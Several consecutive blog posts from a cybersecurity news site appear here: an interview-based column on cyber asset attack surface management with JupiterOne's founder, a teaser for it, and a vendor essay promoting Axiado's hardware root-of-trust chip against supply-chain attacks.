And yet, the modern attack surface continues to expand exponentially, largely unchecked. This dichotomy cannot be tolerated over the long run.

Encouragingly, an emerging class of network visibility technology is gaining notable traction. These specialized tools are expressly designed to help companies get a much better grip on the sprawling array of digital assets they’ve come to depend on. Gartner refers to this nascent technology and emerging discipline as “cyber asset attack surface management,” or CAASM.

I sat down with Erkang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based CAASM platform provider, to discuss how security got left so far behind in digital transformation – and why getting attack surface management under control is an essential first step to catching up.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Shoring up fast-and-risky

For most of the past 25 years, company networks were made up of clearly defined internal boundaries encompassed by a hard-and-fast perimeter. And the role of the security team was straightforward: defend the network, protect IT.

But then along came digital transformation. Internal and external network boundaries gave way to agile software development and everything-as-a-hosted-service. Organizations today move as fast as they can, expect to break things and count on iterating improvements on the fly. Fast-and-risky has become the working definition of software innovation.

Rock star developers in cutting-edge organizations are encouraged to make things happen. They live-and-die by the tenants of open-source and DevOps and lean on cloud-native IT infrastructure. Accelerating complexity has been the result.

The problem with following the fast-and-risky mantra is that many failures turn out to be architectural in nature, are not easy to fix and can all too easily escape notice or, worse, be ignored. Meanwhile, security teams, for the most part, have been stuck in a legacy mindset of striving to keep things as simple and as consistent as possible, Erkang observes.

And this, he argues, is where threat actors foment chaos. It seems ludicrous, but in one sense it’s easier than ever for malicious hackers to get deep access, steal data, spread ransomware, disrupt infrastructure and gain long-run unauthorized access.

Zheng

“There’s a fundamental disconnect between what the business wants and what the security team wants,” Erkang told me. “And this is where the chaos comes from . . . the bad guy hackers aren’t necessarily taking advantage of the complexity; they’re really taking advantage of this disconnect.”

Embracing complexity

The opportunity, going forward then, is for security to jump fully onboard the digital transformation bandwagon.

Legacy defenses at the gateway, firewall, endpoint and application levels must be rearchitected and scaled-up. That’s what a passel of emerging security frameworks like Zero Trust Network Access (ZTNA,) Cloud Workload Protection Platform (CWPP,) Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) are all about. Network security must be architected to effectively blunt non-stop malicious probing and cut-off the breaches enabled in a fast-and-risky operating environment.

At the same time, the expansion of the attack surface somehow needs to be slowed — and ultimately reversed. And this is where CAASM technology and practices come in – by fostering cyber hygiene on the ground floor.

Erkang is in the camp making the argument that security teams have an opportunity to lead the way by not merely tolerating complexity but by embracing it. “Security needs to focus on supporting innovation and advancement by understanding complexity; this is now possible with data, with automation and with an engineering mindset,” he says.

Anything and everything that supports any element of digital operations ought to be considered a cyber asset that needs constant care and feeding — with security top of mind, he says. CAASM technology leverages APIs to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services.

With context, granular policies can then be set in place and enforced. Machine learning and automation can be brought to bear in a way that infuses security without unduly hindering agility. A lot can be gained by simply imposing wise configuration of all cyber assets, Erkang says. What’s more, this same level of granular analysis and policy enforcement can — and should — be directed at identifying, monitoring and patching software vulnerabilities, he argues.

Taking the security angle

In one sense, taming complexity is all about understanding context. Erkang makes a strong argument that the best way for an organization to gain actionable understanding of its cyber assets in a fast-and-risky operating environment is to come at it from the security perspective.

Erkang gave me the example of a company seeking to take stock of its cloud data stores. Let’s say an organization wants to more proactively manage its Amazon Web Services S3 buckets. JupiterOne, in this scenario, would assemble and maintain a detailed catalogue of the configuration status of all these assets.

Granular policies could then be enforced that consider the sensitivity of data held in any given S3 bucket, as well as the associated access privileges. These are privileges that often are allowed by default to cascade across several tiers of user groups — in support of the go-fast-and-break mindset. Tightening these privileges with just the right touch shrinks the attack surface.

According to Gartner, CAASM capabilities can help companies “improve basic security hygiene by ensuring security controls, security posture and asset exposure are understood and remediated across the environment.”

It strikes me that the beauty of this is that improving visibility is more about creating operational effectiveness, strengthening security and lowering risk for organizations is also paving the way for more effective cyber asset management.

“Security needs to transform from an enforcing function to a business enabling and a wellness function,” Erkang says. “Understanding your cyber assets and how all the dots connect can be the starting point to proactively manage different functions, not just within security, but also outside of security, as well.”

It’s notable that an unprecedented number of fresh security frameworks are vying for traction at the moment. For company decision-makers, this can be confusing. But the effort to sort things and determine what works best for their organization is well worth it. This is all part of raising the security bar. CAASM could be a cornerstone. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Defending companies as they transition to cloud-first infrastructures has become a very big problem – but it’s certainly not an unsolvable one.

Coming Wed., May 18: How security teams can help drive business growth — by embracing complexity. 

The good news is that a long-overdue transition to a new attack surface and security paradigm is well underway, one built on a fresh set of cloud-native security frameworks and buttressed by software-defined security technologies.

It strikes me that the security systems we will need to carry us forward can be divided into two big buckets: those that help organizations closely monitor network traffic flying across increasingly cloud-native infrastructure and those that help them keep their critical system configurations in shipshape.

There’s a lot percolating in this second bucket, of late. A bevy of cybersecurity vendors have commenced delivering new services to help companies gain visibility into their cyber asset environment, and remediate security control and vulnerability gaps continuously. This is the long-run path to slowing the expansion of a modern attack surface.

“The challenge is that cyber assets are exploding out of control and security teams are having a hard time getting a grasp on what’s going on,” says Ekrang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based asset visibility platform. “But at the same time, because everything is now software-defined, we actually can approach this problem with a data-driven and an automation-driven mechanism.”

JupiterOne is in a group of cybersecurity vendors that are innovating new technology designed to help companies start doing what they should have done before racing off to migrate everything to the cloud. What happened was that digital transition shifted into high gear without anyone giving due consideration to the security gaps they were creating.

The need to start doing this is glaring; so the rise of specialized technology to get this done is a welcomed development.

Indeed, research firm Gartner very recently created yet another cybersecurity acronym for this emerging class of asset visibility platforms  and practices: cyber asset attack surface management, or CAASM. Gartner lists JupiterOne, Brinqa, AirTrack Software, Axonius, Panaseer and Sevco Security as leading suppliers of CAASM systems.

The common denominator among CAASM vendors is that they provide a centralized platform that can help companies attain meaningful, actionable visibility of their system configurations and vulnerability patching — across the breadth of their cloud-native, hybrid-cloud, and multi-cloud networks.

There’s really no longer any excuse for any organization to lack visibility into how their cyber assets are intermeshing, moment-to-moment, and whether this is occurring according to established best practices.

I’ve had a couple of deep discussions with JupiterOne about this. A drill-down is coming tomorrow in a news analysis column and podcast. Stay tuned.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s a scenario executives know too well.

Related: Third-party audits can hold valuable intel

You and your cybersecurity team do everything correctly to safeguard your infrastructure, yet the frightening alert still arrives that you’ve suffered a data breach.

It’s a maddening situation that occurs far more often than it should.

One of the main culprits for these incredibly frustrating attacks has not so much to do with how a team functions or the protocols a company employs, but instead, it’s a procurement issue that results from supply-chain shortcomings and the hard-to-detect vulnerabilities layered into a particular device.

“The same technologies that make supply chains faster and more effective also threaten their cybersecurity,” writes David Luki, a privacy, security, and compliance consultant. “Supply chains have vulnerabilities at touchpoints with manufacturers, suppliers, and other service providers.”

The inherent complexity of the supply chain for modern technology is a reason why so many cybercrime attempts have been successful. Before a device reaches the end user, multiple stakeholders have contributed to it or handled it. CPUs, GPUs, drives, network controllers, and peripherals can each originate at a different supplier.

Then there are firmware developers, transport agencies, testing facilities, and security evaluation agencies that handle the device before it is sent to the corporate client. From there, likely operations staff, audit staff, and IT department personnel handle the device before it finally makes its way into the hands of the intended operator.

This complexity can be compounded by the effects of world events like COVID-19 or a war, resulting in manufacturing slowdowns and lockdowns. Such events have led to parts shortages that force the use of older and less-secure replacement parts to meet schedules, which emphasizes the need for innovation and for additional suppliers.

Lorenzo

As the European Union Agency for Cybersecurity (ENISA) puts it: “The chain reaction triggered by one attack on a single supplier can compromise a network of providers.” ENISA found that 66 percent of cyberattacks focus on the supplier’s code.

The susceptibility laden throughout the device’s product journey leads to an increased risk. Cybersecurity experts like Luki? and the researchers at ENISA recommend that organizations limit the number of suppliers they contract, develop a minimum standard for those with whom they engage, and verify a supplier’s code and security protocols before finalizing terms. But these tactics go only modestly far in protecting you, while the core problem remains.

There is the potential for a reliable solution that can bring some peace of mind however. The Trusted Control/Compute Unit, or TCU, built by Axiado introduces an enhanced zero-trust model to the market.

This artificial intelligence-driven, chip-scale innovation offers multiple and hierarchical trust relationships for complex ownership structures and transitions. It provides an answer to the most common and dangerous forms of cybercrime:

•Security at the root.  With its proactive platform root-of-trust design, the TCU eliminates fragmentation and establishes safeguards for pre-boot, at-boot, and runtime stages of critical device components and functions.

•Anti-counterfeit, anti-theft, and anti-tampering features.  A ground-up solution, the TCU addresses the risks in supply-chain management through its hierarchical infrastructure that has multiple stakeholders and its use of transition management between those stakeholders. TCU’s capabilities encompass a depth and breadth of systems analysis and cutting-edge security management that locates and contains attacks.

•Threat detection.  The TCU deploys AI-based runtime threat-detection surveillance and remediation for enhanced tamper

Traceability and accountability.  With the TCU, networks have advanced forensic abilities to track digital activity and maintain system integrity.

The features of the TCU can greatly help to resolve the four most pressing concerns that can impact any company’s cybersecurity initiatives. The first major problem the TCU solves is in the area of data loss, modification, or exfiltration. These measures, enabled by security at the root and AI, protect users, devices, and network data.

A second problem area that the TCU addresses is failures or loss of system availability. The benefit of security at the root is it protects systems from crippling firmware attacks that can severely compromise and even disable systems.

Third, the TCU solves the issue of a reduction in the availability of components. Control and management of system security can be offloaded from the main CPU and related processors to a TCU.

This allows flexibility to use older components in times of supply shortages as we’ve experienced during COVID-19 and other world events. The TCU offsets the security shortcomings in these alternative devices.

Finally, the TCU safeguards against reputation risk. A TCU-based solution preserves a company’s reputation by stopping unauthorized alterations or implants throughout a product’s lifecycle.  Maintaining a sterling reputation with vendors and suppliers is crucial to long-term success for individual companies and the ecosystems in which they operate.

The good news for executives and in-house cybersecurity experts is that there is finally a way to confidentially mitigate the relentless supply-chain attacks. Axiado’s single-chip solution lessens complex integration of multiple parts while adding new layers of protection. The TCU addresses the supply-chain risks from counterfeits, substitutions, tampering, theft, and implants while adding accountability to the ownership process.

About the essayist: Josel Lorenzo, is vice president of products, at Axiado, which supplies advanced technologies to secure the hardware root of trust.